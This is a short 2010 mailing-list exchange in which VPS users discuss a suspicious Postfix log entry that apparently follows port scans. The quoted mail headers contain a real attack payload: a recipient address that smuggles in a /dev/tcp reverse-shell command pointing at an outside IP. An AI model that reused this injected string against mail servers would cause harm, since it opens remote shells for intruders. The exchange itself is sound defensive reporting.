Re: [bitfolk] Security - not just SSH

Hi Alastair,

I received the very same e-mail, only a matter of minutes after yours. My
server is not listed as an MX for any domains hence it looks like the
exploit attempts were a follow-up to a sweeping port scan. No doubt other
Bitfolk VPS's received the same thing.

Mathew

On Thu, March 18, 2010 7:47 am, Alastair Sherringham wrote:

> The httpd are often mod_proxy or PHP/phpMyAdmin attempts (no PHP
> here), but an odd record in the Postfix log today was a little
> different :
>
> X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
> 2>&0"
> Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
> 2>&0"@calliope.bitfolk
> Received: from bluedick (debian01.vservers.at [194.106.206.7])
> by calliope (Postfix) with SMTP id F1B31DC001
> for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
> 2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
> Message-Id: <20100317225313.F1B31DC001@calliope>
> Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
> From: blue@???
> To: undisclosed-recipients:;
>
>
> I assume some sort of attempt to break Postfix. This message was
> delivered to "root" mailbox (no content).
> Alastair Sherringham